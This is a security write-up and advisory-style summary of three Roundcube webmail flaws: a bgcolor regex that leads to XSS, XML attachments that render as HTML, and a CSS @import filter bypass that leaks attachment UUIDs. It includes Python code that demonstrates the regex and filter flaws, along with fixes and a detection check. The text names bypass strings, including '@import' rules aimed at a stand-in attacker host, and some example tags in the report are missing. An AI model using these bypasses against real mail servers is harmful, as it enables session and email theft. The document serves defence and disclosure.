Full Report
Roundcube is an open source webmail application that lets users read their email in the browser. Many government agencies use it, which makes it an attractive target for exploitation, and naturally the biggest threat is XSS through an email. Roundcube ships its own email sanitizer, called washtml, in which the author could not find any vulnerabilities. Once sanitization is done, however, further modifications are made to the output. When rendering an email, Roundcube does not put the content into an iframe; it builds a raw HTML page, so it first has to remove the body, head and other document-level tags. This is where the first issue lies: the replacement of tags and attribute values is done with simple regexes.

When processing the bgcolor attribute, the code performs attribute parsing and substitution with a regex. The regex /\s?bgcolor=["\']*[a-z0-9#]+["\']*/i accounts for every possible delimiter, but it does not consider that bgcolor=XXX could be placed inside the value of another attribute. The author provides an example of a body field with . The bgcolor and the closing double quote are matched and removed, which leaves the new tag looking like . What is interesting about the regex is that it should only match when it finds the same delimiter (" or ') opening and closing the value; instead it happily matches a value with no opening quote and closes on a quote. Man, regexes are terrible!

Clicking the Open button for an attachment simply adds the _download=1 query parameter. The Content-Disposition header then either marks the response as an attachment or inlines it. The filename, MIME type and charset are all sent along with the data. The MIME type is not checked at all; it comes only from the file type. While HTML and SVG files are sanitized, nothing else is, and the author found that XML files bypass the check and still render as HTML. This last bug was a known issue that had theoretically been fixed by disabling the Open button for XML files. If it were possible to obtain a link to the file directly, the XSS would still be possible, but IMAP uses a random ID.
Since Roundcube lacks strong protections such as a CSP and sandboxing, the author looked for a way to leak that link. The main defense against CSS-based leaks is a regex-based blocklist filter on the CSS text, which tries to ban url() and @import so that no remote connections can be made. For @import rules the word is blocked except when it is followed by an a, to allow the !important keyword. Notably, the check is run on a stripped-down, normalized version of the CSS rather than on the full stylesheet. The allowance of an a for important, combined with the normalization before verification, allows the usage of import aevil.com! Now, using previously known techniques, the UUID can be leaked from the page via CSS. Using the same vulnerability, styles can be added that make a link in the email overlay every other element and redirect to the XML XSS page. If you don't fix the root cause of the problem, you're going to get hit!

A service worker is a script that the browser stores and that intercepts every HTTP request a page makes. Being able to control a service worker would mean a permanent backdoor, unlike ordinary stored XSS. The specification tries to mitigate this risk by requiring the service worker script to be hosted on the same origin and served with a JavaScript content-type header. In the case of Roundcube, attackers can serve arbitrary JS files as attachments, thanks to the previous bug, with the JavaScript content-type. Using either of the two XSS bugs above, an attacker could register a malicious service worker for a permanent backdoor. Nasty!

Bug 1 was fixed by properly escaping attributes and dropping the bad regex. Bug 2 was fixed by changing dangerous MIME types to text/plain. Bug 3 was fixed by looking for @import and by not stripping the CSS before the checks. The author mentions that this would have been better still if sandboxing or a good CSP had been used too. Overall, an awesome post on a series of weird and novel bugs. I like the destruction of the regex parsers here - definitely something to keep an eye out for.
Analysis Summary
# Vulnerability: Multiple XSS and CSS Injection Flaws in Roundcube Webmail
## CVE Details
- **CVE ID:**
  - **CVE-2024-42009:** Critical XSS via malformed HTML attributes (no user interaction required).
  - **CVE-2024-42008:** High-severity XSS via malicious attachments (requires one click).
  - **CVE-2024-42010:** Information leak/CSS injection via broken filter bypass.
- **CVSS Score:** Critical/High (Specific numerical scores not provided in text, but categorized as such by Sonar).
- **CWE:** CWE-79 (Cross-site Scripting), CWE-20 (Improper Input Validation).
## Affected Systems
- **Products:** Roundcube Webmail.
- **Versions:**
  - 1.6.x versions prior to **1.6.8**.
  - 1.5.x versions prior to **1.5.8**.
- **Configurations:** Default installations rendering emails without a functional Content Security Policy (CSP).
## Vulnerability Description
The primary threat involves a failure in the "desanitization" process after initial cleaning by the `washtml` library.
1. **Regex Failure (CVE-2024-42009):** Roundcube uses a regular expression `/\s?bgcolor=["\']*[a-z0-9#]+["\']*/i` to strip certain attributes. Because the regex does not account for nested attributes or mismatched quotes, an attacker can craft a tag where the regex prematurely clips an attribute, "liberating" malicious JavaScript (e.g., `onload`) from what appeared to be a standard string.
2. **MIME Type Bypass (CVE-2024-42008):** Roundcube failed to properly sanitize or restrict certain MIME types (notably XML). An attacker can upload a malicious XML file as an attachment; when viewed, it renders as HTML in the browser's context.
3. **CSS Filter Bypass (CVE-2024-42010):** The CSS blocklist filter intended to stop `url()` and `@import` was flawed. It allowed `@import` if followed by an `a` (intended for `!important`). Attackers could use `@import a[url]` to bypass the check and leak sensitive tokens (like UUIDs) via CSS injection.
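To make the regex failure (item 1 above and the Full Report) concrete, here is an added Python example, not Roundcube's own code (which is PHP): it applies the page's `bgcolor` regex to a constructed `<body>` tag, compares the attribute set a lenient HTML parser sees before and after the substitution, and shows the parser-based removal with escaped values beside it. The sample tag, the attribute names in it and all helper names are constructed for illustration.

```python
import re
from html import escape
from html.parser import HTMLParser

# Roundcube's pre-fix PHP regex /\s?bgcolor=["\']*[a-z0-9#]+["\']*/i, as quoted in the
# report, translated one-to-one to Python's re module.
BGCOLOR_RE = re.compile(r'\s?bgcolor=["\']*[a-z0-9#]+["\']*', re.IGNORECASE)

# Constructed sample (hypothetical): "bgcolor=" sits inside the value of title, and a second
# attribute carries text that is only a string until the quote boundaries move.
SAMPLE = '<body title="x bgcolor=red" data-note="data-injected=1">'

def strip_bgcolor_regex(tag: str) -> str:
    """The flawed approach: textual substitution on an already-serialized tag."""
    return BGCOLOR_RE.sub("", tag)

class _FirstTagAttrs(HTMLParser):
    """Record the attributes of the first start tag the way a lenient HTML parser sees them."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if self.attrs is None:
            self.attrs = attrs

def parse_attrs(tag: str) -> dict:
    p = _FirstTagAttrs()
    p.feed(tag)
    p.close()
    return dict(p.attrs or [])

def liberated_attrs(tag: str) -> set:
    """Attribute names that exist only AFTER the regex ran: string content promoted to markup."""
    return set(parse_attrs(strip_bgcolor_regex(tag))) - set(parse_attrs(tag))

def strip_bgcolor_parsed(tag: str) -> str:
    """The fix in spirit: parse, drop the attribute, re-serialize with every value escaped."""
    kept = [(k, v) for k, v in parse_attrs(tag).items() if k != "bgcolor"]
    return "<body" + "".join(f' {k}="{escape(v or "", quote=True)}"' for k, v in kept) + ">"

if __name__ == "__main__":
    print(strip_bgcolor_regex(SAMPLE))   # the closing quote of title is gone
    print(liberated_attrs(SAMPLE))       # {'data-injected'}
    print(strip_bgcolor_parsed('<body bgcolor="#fff" title="a">'))  # <body title="a">
```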
## Exploitation
- **Status:** PoC available; historically, similar vulnerabilities in Roundcube have been exploited in the wild by APT groups (e.g., Winter Vivern).
- **Complexity:** Medium.
- **Attack Vector:** Network (Email-based). An attacker sends a specially crafted email to the victim.
## Impact
- **Confidentiality:** High. Attackers can steal emails, contacts, and session tokens.
- **Integrity:** High. Attackers can send emails from the victim's account or register a **Service Worker** for a permanent backdoor/persistent XSS.
- **Availability:** Low.
## Remediation
### Patches
Update to the following versions immediately:
- **Roundcube 1.6.8**
- **Roundcube 1.5.8**
### Workarounds
- Implement a strict **Content Security Policy (CSP)** to prevent unauthorized external script execution.
- Use browser sandboxing for email rendering where possible.
- Disable the "Open" button for dangerous or unknown attachment types at the server level.
## Detection
- **Indicators of Compromise:** Unusual `@import` rules in captured email traffic or database entries; unexpected Service Worker registrations in user browsers; XML attachments with embedded HTML/script tags.
- **Detection methods and tools:** Static analysis of Roundcube installations for outdated versions; monitoring web server logs for access to attachment UUIDs by unauthorized IPs.
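As an added example tied to the CSS filter bypass (item 3 under Vulnerability Description and the Full Report) and to the `@import` indicator listed above, the Python below reconstructs a hypothetical filter with the two properties the report names (normalize first, then ban `import` unless an `a` follows) beside a check that matches the at-rule itself on exactly the text that will be emitted, and a line-level detection view over the same rules. None of this is Roundcube's code; the normalization step, the sample rules and the function names are assumptions, and the samples do not reproduce the report's payload.

```python
import re

# Constructed sample rules (hypothetical; not the report's payload and not Roundcube code).
SAMPLES = {
    "important": "p { color: red !important; }",
    "url": "h1 { background: url(https://example.test/x.png); }",
    "import_a": "@import aevil.example/leak.css;",
    "import_quoted": '@import "evil.example/leak.css";',
    "comment": "/* @import here is only a comment */ p { color: red; }",
}

# Hypothetical reconstruction of the flawed filter the report describes: the text is
# normalized first (assumed here: all whitespace dropped), then "import" is banned
# unless an "a" follows, so that "!important" survives. The two decisions combine.
FLAWED_BLOCK = re.compile(r"import[^a]|url\(", re.IGNORECASE)

def flawed_css_allowed(css: str) -> bool:
    return FLAWED_BLOCK.search(re.sub(r"\s+", "", css)) is None

# Corrected approach: match the @import at-rule and url() themselves (the at-sign and the
# word boundary make "!important" irrelevant), refuse backslash escapes outright, and run
# the check on exactly the text that will be emitted, never on a stripped copy of it.
_COMMENT = re.compile(r"/\*.*?\*/", re.DOTALL)
REMOTE_RULE = re.compile(r"@\s*import\b|\burl\s*\(|\\", re.IGNORECASE)

def sanitize_css(css: str):
    """Return the CSS that may be emitted, or None if the whole block must be dropped."""
    emitted = _COMMENT.sub("", css)  # comments are removed from the output...
    return None if REMOTE_RULE.search(emitted) else emitted  # ...and the output is what gets checked

def fixed_css_allowed(css: str) -> bool:
    return sanitize_css(css) is not None

def findings(css: str) -> list:
    """Detection view: (line number, text) of every emitted line that trips the rule."""
    return [(n, line.strip()) for n, line in enumerate(_COMMENT.sub("", css).splitlines(), 1)
            if REMOTE_RULE.search(line)]
```

The flawed filter blocks the harmless comment sample and lets the `import_a` sample through, while the corrected check does the opposite.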
## References
- **Vendor Advisory:** hxxps[://]github[.]com/roundcube/roundcubemail/releases/tag/1.6.8
- **Sonar Technical Analysis:** hxxps[://]www[.]sonarsource[.]com/blog/government-emails-at-risk-critical-cross-site-scripting-vulnerability-in-roundcube-webmail/
- **Related APT Research:** hxxps[://]www[.]welivesecurity[.]com/en/eset-research/winter-vivern-exploits-zero-day-vulnerability-roundcube-webmail-servers/